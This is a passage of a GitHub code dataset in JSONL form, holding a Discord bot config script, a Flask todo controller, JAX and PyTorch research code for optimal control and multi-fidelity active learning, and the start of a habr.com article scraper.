open(configFilepath, 'r') as CONFIG:\n CONFIGreader = csv.reader(CONFIG)\n lists = list(CONFIGreader)\n for line in lists:\n if line[0] == 'squadReport':\n line[1] = ID\n \n with open(configFilepath, 'w') as wCONFIG:\n CONFIGwriter = csv.writer(wCONFIG)\n CONFIGwriter.writerows(lists)\n\ndef setPUBGToken():\n \n ID = input('Please enter the developer API TOKEN for PUBG: ')\n with open(tokenFilepath, 'r') as CONFIG:\n CONFIGreader = csv.reader(CONFIG)\n lists = list(CONFIGreader)\n for line in lists:\n if line[0] == 'PUBGapi':\n line[1] = ID\n \n with open(tokenFilepath, 'w') as wCONFIG:\n CONFIGwriter = csv.writer(wCONFIG)\n CONFIGwriter.writerows(lists)\n\ndef setDiscordToken():\n \n ID = input('Please enter the developer API TOKEN for the Discord bot: ')\n with open(tokenFilepath, 'r') as CONFIG:\n CONFIGreader = csv.reader(CONFIG)\n lists = list(CONFIGreader)\n for line in lists:\n if line[0] == 'discordPUBGbot':\n line[1] = ID\n \n with open(tokenFilepath, 'w') as wCONFIG:\n CONFIGwriter = csv.writer(wCONFIG)\n CONFIGwriter.writerows(lists)\n \ndef configChannels():\n\n setRegistrationChannelID()\n setSoloChannelID()\n setDuoChannelID()\n setSquadChannelID()\n\ndef configTokens():\n\n setDiscordToken()\n setPUBGToken()\n\ndef configAll():\n\n setDiscordToken()\n setPUBGToken()\n setRegistrationChannelID()\n setSoloChannelID()\n setDuoChannelID()\n setSquadChannelID()\n\n","repo_name":"SulimanCS/pubg-reports","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2714571255","text":"from flask import Flask, render_template, url_for, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom models.todo import db, Todo\n\n\ndef display_current_tasks(template):\n tasks = Todo.query.order_by(Todo.date_created).all()\n print(tasks)\n return render_template(template, tasks=tasks)\n\ndef display_task(id, template):\n task = Todo.query.get_or_404(id)\n return render_template(template, task=task)\n\ndef store(task_content):\n new_task = Todo(content=task_content)\n try:\n db.session.add(new_task)\n db.session.commit()\n return True\n except:\n return False\n\ndef delete_task(id):\n task_to_delete = Todo.query.get_or_404(id)\n try:\n db.session.delete(task_to_delete)\n db.session.commit()\n return True\n except:\n return False\n\ndef update_task(id, new_content):\n task = Todo.query.get_or_404(id)\n try:\n task.content = new_content\n db.session.commit()\n return True\n except:\n return False","repo_name":"jkolp/simple_task_manager","sub_path":"controllers/task_controller.py","file_name":"task_controller.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26946941167","text":"#!/usr/bin/env python\n\nimport jax\nimport jax.numpy as np\n\nimport gradient_gp\nimport sampling\nimport pontryagin_utils\nimport plotting_utils\nimport nn_utils\n\nimport ipdb\nimport matplotlib\nimport matplotlib.pyplot as pl\nimport tqdm\nfrom functools import partial\n\nfrom jax.config import config\n# config.update(\"jax_debug_nans\", True)\njax.config.update(\"jax_enable_x64\", True)\n\nimport numpy as onp\n\n# import matplotlib\n# import matplotlib.pyplot as pl\n# pl.rcParams['text.usetex'] = True\n#\n# matplotlib.use(\"pgf\")\n# matplotlib.rcParams.update({\n# \"pgf.texsystem\": \"pdflatex\",\n# 'font.family': 'serif',\n# 'text.usetex': True,\n# 'pgf.rcfonts': False,\n# })\n\n\n\ndef uniform_sampling_learning(problem_params, algo_params, key):\n\n if algo_params['load_last']:\n\n y0s = np.load('datasets/last_y0s.npy')\n lamTs = np.load('datasets/last_lamTs.npy')\n\n else:\n\n key, subkey = jax.random.split(key)\n y0s, lamTs = sample_uniform(problem_params, algo_params, subkey)\n\n # shuffle data to 'get rid of' interdependence\n key, subkey = jax.random.split(key)\n permuted_idx = jax.random.permutation(subkey, np.arange(y0s.shape[0]))\n\n y0s = y0s[permuted_idx, :]\n lamTs = lamTs[permuted_idx, :]\n\n # normalise all data (xs, lambdas, values)\n y0s = y0s / y0s.std(axis=0)[None, :]\n\n # partition data into init, main, eval.\n # init = data for fitting first GP and optimising GP hyperparams.\n # main = big pool to sample from when fitting GP.\n # eval = holdout set to do MC estimate of approximation error.\n init_y0s, main_y0s, eval_y0s = np.split(y0s, [128, y0s.shape[0]-256], axis=0)\n\n\n # make GP, optimise hyperparams.\n nx = problem_params['nx']\n initparams = {\n 'log_amp': np.log(12),\n 'log_scale': np.zeros(nx),\n }\n\n gp_xs, gp_ys, gp_gradflags = gradient_gp.reshape_for_gp(init_y0s)\n\n gp, opt_params, nll = gradient_gp.get_optimised_gp(\n gradient_gp.build_gp,\n initparams,\n gp_xs,\n gp_ys,\n gp_gradflags,\n plot=algo_params['gp_train_plot'],\n )\n\n print(opt_params)\n\n # opt_params = {\n # 'log_amp': np.log(12),\n # 'log_scale': np.zeros(nx) + .5,\n # }\n\n\n main_xs, main_ys, main_gradflags = gradient_gp.reshape_for_gp(main_y0s)\n eval_xs, eval_ys, eval_gradflags = gradient_gp.reshape_for_gp(eval_y0s)\n\n x0max, x1max = np.abs(main_xs).max(axis=0)\n xbounds = (-x0max, x0max)\n ybounds = (-x1max, x1max)\n\n N_iters = algo_params['N_learning_iters']\n\n mean_stds = onp.zeros(N_iters)\n rmses = onp.zeros(N_iters)\n\n # maaaan fuck that gp shit lets try the nn again.\n try_nn = False\n if try_nn:\n nx = problem_params['nx']\n\n V_nn = nn_utils.nn_wrapper(\n input_dim = nx,\n layer_dims = algo_params['nn_layersizes'],\n output_dim = 1,\n )\n\n key, subkey = jax.random.split(key)\n nn_params = V_nn.init_nn_params(subkey)\n\n\n batchsize = algo_params['nn_batchsize']\n N_epochs = algo_params['nn_N_epochs']\n\n # make a test set or not.\n testset_fraction = algo_params['nn_testset_fraction']\n\n nn_xs, nn_ys = np.split(main_y0s, [nx], axis=1)\n\n # normalise. just to experiment. todo, later un-normalise for inference.\n # nn_xs = nn_xs / nn_xs.std(axis=0)[None, :]\n # nn_ys = nn_ys / nn_ys.std(axis=0)[None, :]\n\n nn_params, outputs = V_nn.train(\n nn_xs, nn_ys, nn_params, algo_params, key\n )\n\n plotting_utils.plot_nn_train_outputs(outputs)\n\n pl.figure()\n extent=5\n plotting_utils.plot_fct(partial(V_nn.nn.apply, nn_params),\n (-extent, extent), (-extent, extent), N_disc=256)\n\n plotting_utils.plot_fct_3d(partial(V_nn.nn.apply, nn_params),\n (-extent, extent), (-extent, extent), N_disc=256)\n\n # this is all still the normalised data.\n nplot = 100\n pl.gca().scatter(nn_xs[0:nplot, 0], nn_xs[0:nplot, 1], nn_ys[0:nplot, 2])\n\n\n pl.show()\n ipdb.set_trace()\n\n\n # add this many data points per iteration\n batch_size = 32\n\n for i in range(N_iters):\n # just add one more sample to the GP.\n # None to match shapes\n\n # easier to make this new every time\n y0s = np.concatenate([init_y0s, main_y0s[0:i*batch_size, :]], axis=0)\n gp_xs, gp_ys, gp_gradflags = gradient_gp.reshape_for_gp(y0s)\n\n # only fit V, not costate - this is dumb, but just to see whether this improves problems\n # gp_xs = gp_xs[gp_gradflags == 0]\n # gp_ys = gp_ys[gp_gradflags == 0]\n # gp_gradflags = gp_gradflags[gp_gradflags == 0]\n\n gp = gradient_gp.build_gp(opt_params, gp_xs, gp_gradflags)\n\n npts = y0s.shape[0]\n name = f'figs/gp_{npts:04d}_pts.png'\n # name = f'figs/gp_iter_{i:04d}.png'\n\n plotting_utils.plot_2d_gp(gp, gp_ys, xbounds, ybounds, save=True, savename=name)\n pl.clf(); pl.close()\n print(f'saved figure \"{name}\" hopefully')\n\n\n\n # pred_gp = trained_gp.condition(ys, (X_pred, pred_grad_flag)).gp\n # y_pred = pred_gp.loc\n # y_std = np.sqrt(pred_gp.variance)\n\n\n\n\n\n\n\n\ndef sample_uniform(problem_params, algo_params, key):\n\n # so nice, exactly from paper\n Q_S = algo_params['x_Q_S']\n nx = problem_params['nx']\n\n # reward_fct = lambda x: -50 * np.maximum(0, x.T @ Q_S @ x - 1) + 5 * np.sqrt(0.01 + x.T @ np.array([[1,0],[0,0]]) @ x)\n # reward_fct = lambda x: -100 * np.maximum(0, x.T @ Q_S @ x - 1) + 10 * np.sqrt(0.01 + np.square(np.array([3, 1]) @ x))\n reward_fct = lambda x: -10 * np.maximum(0, x.T @ Q_S @ x - 1)\n reward_fct = lambda y: -10 * np.maximum(0, y[0:nx].T @ Q_S @ y[0:nx] - 1) # S = some ellipse\n\n Vmax = 10\n reward_fct = lambda y: -10 * np.maximum(0, y[-1] - Vmax) # S = value sublevel set\n\n integrate = pontryagin_utils.make_pontryagin_solver_wrapped(problem_params, algo_params)\n\n y0s, λTs = sampling.geometric_mala_2(integrate, reward_fct, problem_params, algo_params, key)\n\n return y0s, λTs\n\n\n\nif __name__ == '__main__':\n\n # simple control system. double integrator with friction term.\n def f(t, x, u):\n # p' = v\n # v' = f\n # f = -v**3 + u\n # clip so we don't have finite escape time when integrating backwards\n v_cubed = np.clip((np.array([[0, 1]]) @ x)**3, -10, 10)\n return np.array([[0, 1], [0, 0]]) @ x + np.array([[0, 1]]).T @ (u - v_cubed)\n\n def l(t, x, u):\n Q = np.eye(2)\n R = np.eye(1)\n return x.T @ Q @ x + u.T @ R @ u\n\n def h(x):\n Qf = 1 * np.eye(2)\n return (x.T @ Qf @ x).reshape()\n\n\n problem_params = {\n 'f': f,\n 'l': l,\n 'h': h,\n 'T': 8,\n 'nx': 2,\n 'nu': 1,\n 'terminal_constraint': True, # not tested with False for a long time\n }\n\n x_sample_scale = np.diag(np.array([1, 3]))\n x_sample_cov = x_sample_scale @ x_sample_scale.T\n\n # algo params copied from first resampling characteristics solvers\n # -> so some of them might not be relevant\n algo_params = {\n 'pontryagin_solver_dt': 1/16,\n\n # 'pontryagin_sampler_n_trajectories': 32,\n # 'pontryagin_sampler_n_iters': 8,\n # 'pontryagin_sampler_n_extrarounds': 2,\n # 'pontryagin_sampler_strategy': 'importance',\n # 'pontryagin_sampler_deterministic': False,\n # 'pontryagin_sampler_plot': False, # plotting takes like 1000x longer than the computation\n # 'pontryagin_sampler_returns': 'functions',\n\n 'sampler_dt': 1/128,\n 'sampler_burn_in': 0,\n 'sampler_N_chains': 4, # with pmap this has to be 4\n 'samper_samples_per_chain': 2**13, # actual samples = N_chains * samples\n 'sampler_steps_per_sample': 1,\n 'sampler_plot': True,\n 'sampler_tqdm': True,\n\n 'x_sample_cov': x_sample_cov,\n 'x_max_mahalanobis_dist': 2,\n\n 'gp_iters': 100,\n 'gp_train_plot': True,\n 'N_learning_iters': 200,\n\n 'load_last': True,\n\n 'nn_layersizes': [64, 64, 64, 64],\n 'nn_V_gradient_penalty': 2,\n 'nn_batchsize': 128,\n 'nn_N_epochs': 10,\n 'nn_progressbar': True,\n 'nn_testset_fraction': 0.1,\n 'lr_staircase': False,\n 'lr_staircase_steps': 4,\n 'lr_init': 0.01,\n 'lr_final': 0.00005,\n }\n\n # the matrix used to define the relevant state space subset in the paper\n # sqrt(x.T @ Σ_inv @ x) - max_dist\n # = max_dist * sqrt((x.T @ Σ_inv/max_dist**2 @ x) - 1)\n # so we can set Q_S = Σ_inv/max_dist and just get a different scaling factor\n algo_params['x_Q_S'] = np.linalg.inv(x_sample_cov) / algo_params['x_max_mahalanobis_dist']**2\n\n # problem_params are parameters of the problem itself\n # algo_params contains the 'implementation details'\n\n uniform_sampling_learning(problem_params, algo_params, key=jax.random.PRNGKey(0))\n","repo_name":"mbjd/approximate_optimal_control","sub_path":"main_gp.py","file_name":"main_gp.py","file_ext":"py","file_size_in_byte":9127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23447186603","text":"import numpy as np\nimport torch\nimport torch.distributions as distributions\nfrom torch.optim import Adam\nfrom torch.optim import LBFGS\n# from tqdm.notebook import tqdm\n\nimport time\n\nfrom config import opt\nimport model.Utils as utils\n\n# import data.dataset_active as dataset\nfrom model.BaseNet import AdaptiveBaseNet\n\nfrom infrastructure.misc import *\n\n\nclass BaldAL:\n \n def __init__(self, opt, synD):\n \n self.data = synD\n \n self.logger = opt.logger\n self.verbose = opt.verbose\n \n self.M = opt.M\n self.input_dims = opt.input_dim_list\n self.output_dims = opt.output_dim_list\n self.base_dims = opt.base_dim_list\n self.hlayers = opt.hlayers_list\n\n self.device = torch.device(opt.placement)\n self.torch_type = opt.torch_type\n \n self.max_epochs = opt.max_epochs\n self.print_freq = opt.print_freq\n self.activation = opt.activation\n self.opt_lr = opt.opt_lr\n \n self.nns_list, self.nns_params_list, self.log_tau_list = self.init_model_params()\n \n self.reg_strength = opt.reg_strength\n self.learning_rate = opt.learning_rate\n \n self.Nquery = opt.Nquery\n \n\n \n \n \n \n def init_model_params(self,):\n nns_list = []\n nns_params_list = []\n log_tau_list = []\n \n for m in range(self.M):\n if m == 0:\n in_dim = self.input_dims[m]\n else:\n in_dim = self.input_dims[m] + self.base_dims[m-1]\n #\n layers = [in_dim] + self.hlayers[m] + [self.base_dims[m]] + [self.output_dims[m]]\n print(layers)\n nn = AdaptiveBaseNet(layers, self.activation, device=self.device, torch_type=self.torch_type)\n nn_params = nn.parameters()\n log_tau = torch.tensor(0.0, device=self.device, requires_grad=True, dtype=self.torch_type)\n \n nns_list.append(nn)\n nns_params_list.append(nn_params)\n log_tau_list.append(log_tau)\n #\n \n return nns_list, nns_params_list, log_tau_list\n \n def forward(self, X, m, sample=False):\n # first fidelity\n Y_m, base_m = self.nns_list[0].forward(X, sample)\n \n # propagate to the other fidelity levels\n for i in range(1,m+1):\n X_concat = torch.cat((base_m, X), dim=1)\n # print(X_concat.shape)\n Y_m, base_m = self.nns_list[i].forward(X_concat, sample)\n #\n \n return Y_m, base_m\n\n \n def eval_llh(self, X, Y, m):\n Ns = 5\n llh_samples_list = []\n \n # dist_noise = distributions.normal.Normal(loc=0.0, scale=1/torch.exp(self.log_tau_list[m]))\n \n for ns in range(Ns):\n pred_sample, _ = self.forward(X, m, sample=True)\n \n # log_prob_verify = torch.sum(dist_noise.log_prob(Y-pred_sample))\n # print(log_prob_verify)\n \n log_prob_sample = torch.sum(-0.5*torch.square(torch.exp(self.log_tau_list[m]))*torch.square(pred_sample-Y) +\\\n self.log_tau_list[m] - 0.5*np.log(2*np.pi))\n \n # print(log_prob_sample)\n \n llh_samples_list.append(log_prob_sample)\n #\n \n return sum(llh_samples_list)\n\n def batch_eval_llh(self, X_list, Y_list):\n llh_list = []\n for m in range(self.M):\n llh_m = self.eval_llh(X_list[m], Y_list[m], m)\n llh_list.append(llh_m)\n #\n return sum(llh_list)\n \n def batch_eval_kld(self,):\n kld_list = []\n for m in range(self.M):\n kld_list.append(self.nns_list[m]._eval_kld())\n #\n return sum(kld_list)\n \n def batch_eval_reg(self,):\n reg_list = []\n for m in range(self.M):\n reg_list.append(self.nns_list[m]._eval_reg())\n #\n return sum(reg_list)\n \n def eval_rmse_loss(self, X, Y, m):\n pred, _ = self.forward(X, m, sample=False)\n rmse = torch.sqrt(torch.mean(torch.square(Y - pred)))\n return rmse\n \n def batch_eval_rmse(self, X_list, Y_list):\n rmse_list = []\n for m in range(self.M):\n rmse = self.eval_rmse_loss(X_list[m], Y_list[m], m)\n rmse_list.append(rmse)\n #\n return rmse_list\n \n def eval_mae_loss(self, X, Y, m):\n pred, _ = self.forward(X, m, sample=False)\n mae = torch.mean(torch.abs(Y - pred))\n return mae\n \n def batch_eval_mae(self, X_list, Y_list):\n mae_list = []\n for m in range(self.M):\n mae = self.eval_mae_loss(X_list[m], Y_list[m], m)\n mae_list.append(mae)\n #\n return mae_list\n\n def init_train_optimizer(self, lr, weight_decay):\n opt_params = []\n \n for m in range(self.M):\n \n for nn_param_name, nn_param in self.nns_params_list[m].items():\n # print(nn_param_name)\n opt_params.append({'params':nn_param, 'lr':lr})\n #\n opt_params.append({'params':self.log_tau_list[m], 'lr':lr})\n \n #\n \n return Adam(opt_params, lr=lr, weight_decay=weight_decay)\n \n def eval_rmse(self, m, N_X, N_Y, train=True):\n # inputs are normalized\n N_pred, _ = self.forward(N_X, m, sample=False)\n scales = self.data.get_scales(m, train)\n \n Y = N_Y*scales['y_std'] + scales['y_mean']\n pred = N_pred*scales['y_std'] + scales['y_mean']\n \n rmse = torch.sqrt(torch.mean(torch.square(Y-pred)))\n n_rmse = rmse/scales['y_std']\n \n return rmse.data.cpu().numpy(), n_rmse.data.cpu().numpy()\n \n def eval_rmse_ground(self, m, N_X, np_y_ground, train=True):\n # inputs are normalized\n N_pred, _ = self.forward(N_X, m, sample=False)\n scales = self.data.get_scales(m, train)\n \n mu = np.mean(np_y_ground)\n sig = np.std(np_y_ground)\n\n# np_N_y_ground = (np_y_ground - np.mean(np_y_ground))/np.std(np_y_ground)\n\n np_N_pred = N_pred.data.cpu().numpy()\n interp_np_N_pred = self.data.interp_to_ground(np_N_pred, m)\n \n interp_np_pred = interp_np_N_pred*sig + mu\n \n rmse = np.sqrt(np.mean(np.square(np_y_ground-interp_np_pred)))\n n_rmse = rmse/sig\n \n return rmse, n_rmse\n\n def train(self,):\n \n if self.verbose:\n print('train the model ...')\n \n X_train_list = []\n y_train_list = []\n np_y_train_ground_list = []\n \n X_test_list = []\n y_test_list = []\n np_y_test_ground_list = []\n \n for m in range(self.M):\n \n np_X_train, np_y_train, np_y_train_ground = self.data.get_data(m,train=True, normalize=True, noise=0.01)\n np_X_test, np_y_test, np_y_test_ground = self.data.get_data(m,train=False, normalize=True, noise=0.00)\n \n X_train_list.append(torch.tensor(np_X_train, device=self.device, dtype=self.torch_type))\n y_train_list.append(torch.tensor(np_y_train, device=self.device, dtype=self.torch_type))\n np_y_train_ground_list.append(np_y_train_ground)\n \n X_test_list.append(torch.tensor(np_X_test, device=self.device, dtype=self.torch_type))\n y_test_list.append(torch.tensor(np_y_test, device=self.device, dtype=self.torch_type))\n np_y_test_ground_list.append(np_y_test_ground)\n \n #\n \n hist_test_rmse = []\n hist_test_ground_rmse = []\n \n optimizer_train = self.init_train_optimizer(self.learning_rate, 0.0)\n \n start_time = time.time()\n \n for epoch in range(self.max_epochs+1):\n\n optimizer_train.zero_grad()\n loss = -self.batch_eval_llh(X_train_list, y_train_list) + self.batch_eval_kld() + self.reg_strength*self.batch_eval_reg()\n loss.backward(retain_graph=True)\n optimizer_train.step()\n \n if epoch % self.print_freq == 0:\n \n if self.verbose:\n print('======================================')\n print('%d-th epoch: loss=%.7f' % (epoch, loss))\n print('======================================')\n self.logger.write('=============================================================\\n')\n self.logger.write(str(epoch) + '-th epoch: loss=' + str(loss.data.cpu().numpy()) +\\\n ', time_elapsed:' + str(time.time()-start_time) + '\\n')\n self.logger.write('=============================================================\\n')\n \n buff_test_nRmse = []\n buff_test_nRmse_ground = []\n\n for m in range(self.M):\n\n train_rmse, n_train_rmse = self.eval_rmse(m, X_train_list[m], y_train_list[m], train=True)\n test_rmse, n_test_rmse = self.eval_rmse(m, X_test_list[m], y_test_list[m], train=False)\n \n train_ground_rmse, n_train_ground_rmse = self.eval_rmse_ground(\n m, X_train_list[m], np_y_train_ground_list[m], train=True)\n test_ground_rmse, n_test_ground_rmse = self.eval_rmse_ground(\n m, X_test_list[m], np_y_test_ground_list[m], train=False)\n \n buff_test_nRmse.append(n_test_rmse)\n buff_test_nRmse_ground.append(n_test_ground_rmse)\n \n if self.verbose:\n print(' m=%d:' % (m))\n print(' * (origin) train_rmse=%.7f, test_rmse=%.7f' % (n_train_rmse, n_test_rmse))\n print(' * (ground) train_rmse=%.7f, test_rmse=%.7f' % (n_train_ground_rmse, n_test_ground_rmse))\n# print(' * (ground) train_rmse=%.7f, test_rmse=%.7f' % (train_ground_rmse, test_ground_rmse))\n # if verbose\n self.logger.write('m='+str(m)+'\\n')\n self.logger.write(' * (origin) train_rmse='+str(n_train_rmse)+', test_rmse='+str(n_test_rmse)+'\\n')\n self.logger.write(' * (ground) train_rmse='+str(n_train_ground_rmse)+',test_rmse='+str(n_test_ground_rmse)+'\\n')\n self.logger.write(' * log_tau_m='+str(self.log_tau_list[m].data.cpu().numpy())+'\\n')\n # for m\n \n hist_test_rmse.append(np.array(buff_test_nRmse))\n hist_test_ground_rmse.append(np.array(buff_test_nRmse_ground))\n \n # if epoch\n self.logger.flush()\n # for epoch\n \n N_pred, _ = self.forward(X_test_list[-1], self.M-1, sample=False)\n \n res = {}\n res['test_rmse'] = np.array(hist_test_rmse)\n res['test_ground_rmse'] = np.array(hist_test_ground_rmse)\n res['N_predict'] = N_pred.data.cpu().numpy()\n\n return res\n\n def nonlinear_marginal_base(self, X, m, Wcat_list):\n # first fidelity\n W = Wcat_list[0][0:-1, :]\n b = Wcat_list[0][-1, :].reshape([1,-1])\n #print(W.shape)\n #print(b.shape)\n base_m = self.nns_list[0].forward_base_by_sample(X, W, b)\n \n # propagate to the other fidelity levels\n for i in range(1,m+1):\n W = Wcat_list[i][0:-1, :]\n b = Wcat_list[i][-1, :].reshape([1,-1])\n #print(W.shape)\n #print(b.shape)\n\n X_concat = torch.cat((base_m, X), dim=1)\n base_m = self.nns_list[i].forward_base_by_sample(X_concat, W, b)\n #\n return base_m\n\n def eval_marginal_base_variance(self, Xq, m):\n # pull out the variables required for approximation\n pred_samples_list = []\n Ns = 10\n for ns in range(Ns):\n pred, base = self.forward(Xq, m, sample=True)\n pred_samples_list.append(base)\n #\n \n pred_samples = torch.stack(pred_samples_list)\n pred_samples = torch.reshape(pred_samples, [Ns, -1, 1])\n \n mu = torch.mean(pred_samples, dim=0)\n \n diff = pred_samples - mu\n \n diff_tr = diff.permute(0,2,1)\n \n V_base = torch.sum(torch.einsum('bij,bjk->bik', diff, diff_tr), dim=0)/(Ns-1)\n \n return V_base\n\n def eval_marginal_entropy(self, Xq, m):\n \n V_base = self.eval_marginal_base_variance(Xq, m)\n A = self.nns_list[m].A\n \n N = Xq.shape[0]\n \n K = self.base_dims[m]\n D = self.output_dims[m]\n \n I_N = torch.eye(N, device=self.device, dtype=self.torch_type)\n \n A_Atr = torch.matmul(A, A.T)\n \n kron_A_Atr_I_N = utils.Kronecker(A_Atr, I_N)\n \n # print(V_base.shape)\n # print(kron_A_Atr_I_N.shape)\n \n I_KN = torch.eye(K*N, device=self.device, dtype=self.torch_type)\n \n log_tau = self.log_tau_list[m]\n \n# sign, log_abs_det = torch.slogdet(torch.exp(log_tau)*torch.matmul(kron_A_Atr_I_N, V_base) + I_KN)\n# log_det = torch.log(sign*torch.exp(log_abs_det))\n\n log_det = torch.logdet(torch.exp(log_tau)*torch.matmul(kron_A_Atr_I_N, V_base) + I_KN)\n \n entropy = D*N*(np.log(2*np.pi*np.e)-log_tau) + log_det\n\n return entropy\n \n \n def eval_query_mutual_info(self, Xquery, m):\n \n H_m = self.eval_marginal_entropy(Xquery, m)\n return H_m\n\n def init_query_points(self, Nq, m):\n lb, ub = self.data.get_N_bounds(m)\n scale = (ub-lb).reshape([1,-1])\n uni_noise = np.random.uniform(size=[Nq, self.input_dims[m]])\n \n np_Xq_init = uni_noise*scale + lb\n \n Xq = torch.tensor(np_Xq_init, device=self.device, dtype=self.torch_type, requires_grad=True)\n \n return Xq\n\n\n def eval_query(self, m):\n \n # sometimes the log det will throw numerical erros, if that happens, re-try\n\n mutual_info = None\n Xq = None\n \n max_retry = 10\n count = 0\n success = False\n\n while not success:\n\n if count <= max_retry:\n try:\n\n Xq = self.init_query_points(self.Nquery, m)\n\n np_lb, np_ub = self.data.get_N_bounds(m)\n bounds = torch.tensor(np.vstack((np_lb, np_ub)), device=self.device, dtype=self.torch_type)\n\n optimizer_query = LBFGS([Xq], self.opt_lr)\n\n mutual_info = self.eval_query_mutual_info(Xq, m)\n if self.verbose:\n print('Query m=%d info BEFORE Opt'%(m))\n print(' - info: ', mutual_info.data.cpu().numpy())\n print(' - query: ', Xq.data.cpu().numpy())\n \n self.logger.write(\"start to query fidelity m=\" + str(m) + '\\n')\n self.logger.write(\" - info BEFORE \" + str(mutual_info.data.cpu().numpy()) + '\\n')\n self.logger.write(\" - Xq BEFORE \" + str(Xq.data.cpu().numpy()) + '\\n')\n\n def closure():\n optimizer_query.zero_grad() \n loss = -self.eval_query_mutual_info(Xq, m)\n loss.backward(retain_graph=True)\n\n with torch.no_grad():\n for j, (lb, ub) in enumerate(zip(*bounds)):\n Xq.data[..., j].clamp_(lb, ub) # need to do this on the data not X itself\n #\n #\n return loss\n\n optimizer_query.step(closure)\n\n mutual_info = self.eval_query_mutual_info(Xq, m)\n if self.verbose:\n print('Query m=%d info AFTER Opt'%(m))\n print(' - info: ', mutual_info.data.cpu().numpy())\n print(' - query: ', Xq.data.cpu().numpy())\n \n self.logger.write(\" - info AFTER \" + str(mutual_info.data.cpu().numpy()) + '\\n')\n self.logger.write(\" - Xq AFTER \" + str(Xq.data.cpu().numpy()) + '\\n')\n \n\n if mutual_info < 0:\n if self.verbose:\n print('MI < 0, give another try... count', count)\n self.logger.write('MI < 0, give another try... count ' + str(count) + '\\n')\n self.logger.flush()\n success=False\n count += 1\n else:\n success=True\n #\n except:\n if self.verbose:\n print('Opt fails, give another try... count', count)\n self.logger.write('Opt fails, give another try... count ' + str(count)+'\\n')\n self.logger.flush()\n success=False\n count += 1\n \n # try\n else:\n success=True\n Xq = self.init_query_points(self.Nquery, m)\n mutual_info = torch.tensor(0.0)\n #if\n # while\n\n return mutual_info, Xq\n \n\n# def batch_query(self, penalties):\n# mutual_info_list = []\n# query_list = []\n# for m in range(self.M):\n# mutul_info, Xq = self.eval_query(m)\n# mutual_info_list.append(mutul_info.data.cpu().numpy())\n# query_list.append(Xq.data.cpu().numpy())\n# #\n# reg_mutual_info_list = np.array(mutual_info_list)/np.array(penalties)\n \n# argm = np.argmax(reg_mutual_info_list)\n# argx = query_list[argm]\n \n# return mutual_info_list, query_list, argm, argx\n\n def single_query(self, penalties):\n mutual_info_list = []\n query_list = []\n for m in range(self.M):\n mutul_info, Xq = self.eval_query(m)\n mutual_info_list.append(mutul_info.data.cpu().numpy())\n query_list.append(Xq.data.cpu().numpy())\n #\n reg_mutual_info_list = np.array(mutual_info_list)/np.array(penalties)\n \n argm = np.argmax(reg_mutual_info_list)\n argx = query_list[argm]\n \n self.logger.write('argm='+str(argm)+'\\n')\n self.logger.write('argx='+str(argx)+'\\n')\n self.logger.flush()\n \n return argx, argm\n\n# def debug(self,):\n# print('debug mode ...')\n \n# penalties = [1,1,1]\n \n# mutual_info_list, query_list, argm, argx = self.batch_query(penalties)\n \n# print(mutual_info_list)\n# print(query_list)\n# print(argm)\n# print(argx)\n\n\n\n \n\n \n \n \n \n \n \n# Ntrain_list = [10,5,2]\n# Ntest_list = [10,5,2]\n# Domain = 'Heat_1D'\n\n# synD = dataset.Dataset(Ntrain_list, Ntest_list, Domain)\n\n# model = MFDNN(opt, synD)\n\n# model.train()\n\n# model.debug()","repo_name":"shib0li/DMFAL","sub_path":"model/BaldAL.py","file_name":"BaldAL.py","file_ext":"py","file_size_in_byte":19265,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"34184055420","text":"\r\n\"\"\"\r\nИсточник habr.ru\r\nзадача обойти ленту статей (лучшее за сутки) извлеч данные\r\n\r\nзаголовок\r\nurl статьи\r\nимя автора\r\nссылка на автора\r\nсписок тегов ( имя тега и url)\r\nсписок хабов (имя и url)\r\nспроектировать sql базу данных таким образом\r\nчто-бы данные о тегах хабах и авторах были атомарны, и не дублировались в БД\r\n\"\"\"\r\n\r\nimport re\r\nfrom requests.auth import HTTPProxyAuth\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom typing import List, Dict\r\nfrom pymongo import MongoClient\r\nimport re\r\nimport datetime as dt\r\nimport time\r\n\r\n\r\nclass HabrParser:\r\n domain = 'https://habr.com'\r\n start_url = 'https://habr.com/ru/top/daily'\r\n\r\n def __init__(self):\r\n self.visited_urls = set()\r\n self.post_links = set()\r\n self.posts_data = []\r\n self.headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36\"}\r\n def parse_rows(self, url = start_url):\r\n while url:\r\n if url in self.visited_urls:\r\n break\r\n\r\n response = requests.get(url, headers = self.headers)\r\n time.sleep(0.01)\r\n self.visited_urls.add(url)\r\n soup = BeautifulSoup(response.text, 'lxml')\r\n url = self.get_next_page(soup)\r\n self.search_post_links(soup)\r\n\r\n def get_next_page(self, soup: BeautifulSoup) -> str:\r\n ul = soup.find('ul', attrs = {'class': 'arrows-pagination'})\r\n a = ul.find('a', attrs = {'id': 'next_page'})\r\n next_page_link = f'{self.domain}{a.get(\"href\")}' if a and a.get(\"href\") else None\r\n return next_page_link\r\n\r\n def search_post_links(self, soup: BeautifulSoup) -> List[str]:\r\n posts_list = soup.find('div', attrs = {'class': 'posts_list'})\r\n posts = posts_list.find_all('article', attrs = {'class': 'post_preview'})\r\n links = {item.find(\"a\", attrs = {\"class\": \"post__title_link\"}).get(\"href\") for item in posts}\r\n self.post_links.update(links)\r\n\r\n\r\n def post_page_parse(self):\r\n\r\n for url in list(self.post_links):\r\n if url in self.visited_urls:\r\n continue\r\n response = requests.get( url, headers=self.headers )\r\n time.sleep(1)\r\n while response.status_code != 200:\r\n response = requests.get( url, headers=self.headers )\r\n soup = BeautifulSoup(response.text, 'lxml')\r\n self.visited_urls.add( url )\r\n\r\n pd = {}\r\n pd['url'] = url\r\n pd.update(self.get_post_data(soup))\r\n self.posts_data.append(pd)\r\n\r\n def get_post_data(self, soup: BeautifulSoup):\r\n\r\n result = {}\r\n #total blocks\r\n wrapper = soup.find('div', attrs = {'class': 